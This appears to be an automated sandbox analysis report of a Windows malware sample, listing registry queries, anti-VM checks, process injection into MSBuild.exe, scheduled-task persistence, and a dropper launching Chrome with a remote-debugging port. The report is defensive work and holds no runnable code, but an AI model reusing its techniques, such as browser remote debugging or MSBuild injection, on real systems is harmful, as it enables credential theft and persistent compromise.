Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	d0fba8cbde.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36575e69.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ec9a0b61cd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	74957b3341.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d0fba8cbde.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempW9WWZUDZY0TJU2PIH7GT8GHUCL1E7QKG.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cf533b34eb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9ff7443f7f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b842abf8f3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	d0fba8cbde.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a28245d7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 38 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	74957b3341.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	74957b3341.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
6588	timeout.exe
10544	timeout.exe

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 5 IoCs

pid	Process
4672	taskkill.exe
4760	taskkill.exe
1084	taskkill.exe
1584	taskkill.exe
2032	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876600710942280"	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{D0C0301C-D712-4ADE-8C67-99BDBA4C177D}	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{494D639E-04AF-4801-90B6-63A2E0290CCF}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	firefox.exe

Modifies registry key 1 TTPs 5 IoCs

Modify Registry

pid	Process
10080	reg.exe
10416	reg.exe
9280	reg.exe
7452	reg.exe
9444	reg.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_12980_0x400000_0x2e000_0B89D888C30758F522722A59E7FFBFD53A2964A3A9EF582969F6EB032DAF310F	a28245d7.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{fd9989c1-9e82-4819-a5b2-63078bff6123}\pmem:\MappedFixedPe_svchost015.exe_8148_0x400000_0x2e000_D7D2BC7916A73F931BC40235672179D4D33F93405E3D0EF34E9D150A3DDB6578	a28245d7.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
9104	schtasks.exe
11436	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
5788	rapes.exe
5788	rapes.exe
5196	MSBuild.exe
5196	MSBuild.exe
4580	MSBuild.exe
4580	MSBuild.exe
4580	MSBuild.exe
4580	MSBuild.exe
5196	MSBuild.exe
5196	MSBuild.exe
5424	chrome.exe
5424	chrome.exe
5488	b842abf8f3.exe
5488	b842abf8f3.exe
5488	b842abf8f3.exe
5488	b842abf8f3.exe
5488	b842abf8f3.exe
5488	b842abf8f3.exe
5196	MSBuild.exe
5196	MSBuild.exe
5196	MSBuild.exe
5196	MSBuild.exe
3608	rapes.exe
3608	rapes.exe
4536	ec9a0b61cd.exe
4536	ec9a0b61cd.exe
5196	MSBuild.exe
5196	MSBuild.exe
4536	ec9a0b61cd.exe
4536	ec9a0b61cd.exe
4536	ec9a0b61cd.exe
4536	ec9a0b61cd.exe
5196	MSBuild.exe
5196	MSBuild.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
5020	chrome.exe
5020	chrome.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1192	74957b3341.exe
1360	ab7380df2b.exe
1360	ab7380df2b.exe
1360	ab7380df2b.exe
1360	ab7380df2b.exe
1360	ab7380df2b.exe
7164	MSBuild.exe
7164	MSBuild.exe
7164	MSBuild.exe
7164	MSBuild.exe
4404	rapes.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe
7564	a28245d7.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
7116	u75a1_003.exe
7116	u75a1_003.exe
7116	u75a1_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
6088	msedge.exe
6088	msedge.exe
6088	msedge.exe
6088	msedge.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
3612	msedge.exe
3612	msedge.exe
3612	msedge.exe
3612	msedge.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe
3124	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5424	chrome.exe
Token: SeCreatePagefilePrivilege	5424	chrome.exe
Token: SeShutdownPrivilege	5020	chrome.exe
Token: SeCreatePagefilePrivilege	5020	chrome.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeShutdownPrivilege	5020	chrome.exe
Token: SeCreatePagefilePrivilege	5020	chrome.exe
Token: SeShutdownPrivilege	5020	chrome.exe
Token: SeCreatePagefilePrivilege	5020	chrome.exe
Token: SeDebugPrivilege	4672	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	1584	taskkill.exe
Token: SeDebugPrivilege	1392	firefox.exe
Token: SeDebugPrivilege	1392	firefox.exe
Token: SeDebugPrivilege	1360	ab7380df2b.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeDebugPrivilege	2376	tasklist.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeDebugPrivilege	1332	tasklist.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe
Token: SeShutdownPrivilege	3124	chrome.exe
Token: SeCreatePagefilePrivilege	3124	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
5424	chrome.exe
6088	msedge.exe
6088	msedge.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
5020	chrome.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
1392	firefox.exe
2720	d0fba8cbde.exe
1392	firefox.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2720	d0fba8cbde.exe
2032	Passwords.com
2032	Passwords.com
2032	Passwords.com
7956	9ff7443f7f.exe
7956	9ff7443f7f.exe
7956	9ff7443f7f.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe
1392	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5044 wrote to memory of 5788	5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	90
PID 5044 wrote to memory of 5788	5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	90
PID 5044 wrote to memory of 5788	5044	37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe	90
PID 5788 wrote to memory of 4880	5788	rapes.exe	96
PID 5788 wrote to memory of 4880	5788	rapes.exe	96
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 4880 wrote to memory of 5196	4880	UYpk7xI.exe	97
PID 5788 wrote to memory of 2428	5788	rapes.exe	100
PID 5788 wrote to memory of 2428	5788	rapes.exe	100
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 2428 wrote to memory of 4580	2428	jokererer.exe	101
PID 5196 wrote to memory of 5424	5196	MSBuild.exe	102
PID 5196 wrote to memory of 5424	5196	MSBuild.exe	102
PID 5424 wrote to memory of 1028	5424	chrome.exe	103
PID 5424 wrote to memory of 1028	5424	chrome.exe	103
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 436	5424	chrome.exe	104
PID 5424 wrote to memory of 1896	5424	chrome.exe	105
PID 5424 wrote to memory of 1896	5424	chrome.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2560
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1516

C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe
"C:\Users\Admin\AppData\Local\Temp\37700bf5466bc1a05e759b3cc56f984e8b4e0102e0fc24291bc56587c71310b8.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5044
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5788
- - C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5196
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5424
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
